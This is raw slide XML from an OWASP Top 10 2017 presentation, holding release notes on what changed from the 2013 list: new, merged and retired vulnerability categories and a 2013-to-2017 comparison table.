                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>What changed from 2013 to 2017?</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665720">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Change has accelerated over the last four years, and the OWASP Top 10 needed to change. We've completely refactored the OWASP Top 10, revamped the methodology, utilized a new data call process, worked with the community, re-ordered our risks, re-written each risk from the ground up, and added references to frameworks and languages that are now commonly used. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Over the last decade, and in particularly these last few years, the fundamental architecture of applications has changed significantly:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>JavaScript is now the primary language of the web. node.js and modern web frameworks such as Bootstrap, Electron, Angular, React amongst many others, means source that was once on the server is now running on untrusted browsers. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Single page applications, written in JavaScript frameworks such as Angular and React, allow the creation of highly modular front end user experiences, not to mention the rise and rise of mobile apps using the same APIs as single page apps</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Microservices written in node.js and Spring Boot are replacing older enterprise service bus applications using EJBs and so on. Old code that never expected to be communicated with directly from the Internet is now sitting behind an API or RESTful web service. The assumptions that underlie this code, such as trusted callers, are simply not valid. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>New issues, supported by data</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4:2017 XML External Entity (XXE) is a new category primarily supported by SAST data sets. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>New issues, supported by the community</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>We asked the community to provide insight into two forward looking weakness categories. After 516 peer submissions, and  removing issues that were already supported by data (such as Sensitive Data Exposure and XXE), the two new issues are </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization, responsible for one of the worst breaches of all time, and</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient Logging and Monitoring, the lack of which can prevent or significantly delay malicious activity and breach detection, incident response and digital forensics.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Retired, but not forgotten</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4 Insecure direct object references </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7 Missing function level access control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>merged into A5:2017-Broken Access Control.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A8 CSRF. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Less than 5% of the data set supports CSRF today, which places it around #13 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800" algn="l">
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A10 Unvalidated redirects and forwards</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. Less than 1% of the data set supports this issue today, as it’s now #25</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Aria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dirty="0"/>
              <a:t>RN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Release Notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="73" name="Table 72"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2771163411"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="5334000"/>
          <a:ext cx="6858000" cy="3825240"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{17292A2E-F333-43FB-9621-5CBBE7FDCDCB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3247102">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="381835">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3229063">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="332204">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP Top 10 2013</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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3C752E"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OWASP Top 10 2017</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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A1647"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1 – Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="4E8542"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1:2017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Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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A2 – Broken Authentication and Session Management</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4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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A2:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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Broken Authentication and Session Management</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2"/>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A3 – Cross-Site Scripting (XSS)</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4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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A3:2013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Sensitive Data Exposure</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3"/>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A4 – Insecure Direct Object References </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged+A7]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="4E8542"/>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accent4"/>
                          </a:solidFill>
                          <a:latin typeface="Wide Latin" panose="020A0A07050505020404" pitchFamily="18" charset="0"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>∪</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent4"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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A4:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML External Entity (XXE) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEW]</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4"/>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A5 – Security Misconfiguration</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a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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A5:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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Broken Access Control [Merged]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"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5"/>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A6 – Sensitive Data Exposure</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4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
